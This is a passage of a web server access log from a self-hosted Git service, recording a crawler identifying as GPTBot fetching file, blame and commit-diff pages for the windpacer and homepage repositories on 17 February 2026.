like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/.gitignore" +[17/Feb/2026:13:10:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal" [Client 74.7.227.38] [Length 10746] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm" +[17/Feb/2026:13:10:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 11971] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:13:10:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" [Client 74.7.227.38] [Length 11148] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data" +[17/Feb/2026:13:10:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/App.tsx" +[17/Feb/2026:13:10:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 9902] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/watchdog.py" +[17/Feb/2026:13:10:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.gitignore" [Client 74.7.227.38] [Length 10967] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6" +[17/Feb/2026:13:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12934] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services/geminiService.ts" +[17/Feb/2026:13:10:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx.conf" [Client 74.7.227.38] [Length 11961] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6" +[17/Feb/2026:13:10:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9883] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services/geminiService.ts" +[17/Feb/2026:13:10:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:13:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/services/geminiService.ts" +[17/Feb/2026:13:10:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt" [Client 74.7.227.38] [Length 9871] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal" +[17/Feb/2026:13:10:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal" [Client 74.7.227.38] [Length 9933] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal" +[17/Feb/2026:13:10:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" [Client 74.7.227.38] [Length 10681] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" +[17/Feb/2026:13:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12938] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services/geminiService.ts" +[17/Feb/2026:13:10:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12936] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services/geminiService.ts" +[17/Feb/2026:13:10:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.gitignore" [Client 74.7.227.38] [Length 9908] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.gitignore" +[17/Feb/2026:13:10:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.gitignore" [Client 74.7.227.38] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.gitignore" +[17/Feb/2026:13:10:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx.conf" [Client 74.7.227.38] [Length 10149] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx.conf" +[17/Feb/2026:13:10:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx.conf" [Client 74.7.227.38] [Length 11851] [Gzip 4.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx.conf" +[17/Feb/2026:13:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.gitignore" [Client 74.7.227.38] [Length 9984] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.gitignore" +[17/Feb/2026:13:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx.conf" [Client 74.7.227.38] [Length 796] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx.conf" +[17/Feb/2026:13:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt" [Client 74.7.227.38] [Length 9916] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt" +[17/Feb/2026:13:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services/geminiService.ts" +[17/Feb/2026:13:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services/geminiService.ts" +[17/Feb/2026:13:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services/geminiService.ts" +[17/Feb/2026:13:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 778] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:13:11:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 4659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/watchdog.py" +[17/Feb/2026:13:11:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services/geminiService.ts" +[17/Feb/2026:13:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13140] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services" +[17/Feb/2026:13:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13143] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services" +[17/Feb/2026:13:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10984] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:13:11:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c.patch" [Client 74.7.227.38] [Length 32986996] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" +[17/Feb/2026:13:11:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0" [Client 74.7.227.38] [Length 13933] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0" +[17/Feb/2026:13:11:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 400218] [Gzip 13.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:13:11:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 62480] [Gzip 12.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?show-outdated=&style=split&whitespace=show-all" +[17/Feb/2026:13:11:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 57840] [Gzip 10.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" +[17/Feb/2026:13:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 400463] [Gzip 13.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" +[17/Feb/2026:13:11:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 84518] [Gzip 12.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:13:11:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 57839] [Gzip 10.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" +[17/Feb/2026:13:11:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12937] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services/geminiService.ts" +[17/Feb/2026:13:11:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12937] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services/geminiService.ts" +[17/Feb/2026:13:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10933] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:13:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:13:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/e54b4e832455afb83987fc146872a66900dee5c0" [Client 74.7.227.38] [Length 7491] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0" +[17/Feb/2026:13:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services/geminiService.ts" +[17/Feb/2026:13:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services/geminiService.ts" +[17/Feb/2026:13:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services/geminiService.ts" +[17/Feb/2026:13:11:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services/geminiService.ts" +[17/Feb/2026:13:11:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 287] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" +[17/Feb/2026:13:11:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 77466] [Gzip 10.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6" +[17/Feb/2026:13:11:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 77450] [Gzip 10.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6" +[17/Feb/2026:13:11:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 458465] [Gzip 15.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:13:11:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues" [Client 74.7.227.38] [Length 10077] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/forks" +[17/Feb/2026:13:11:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/labels" [Client 74.7.227.38] [Length 7610] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 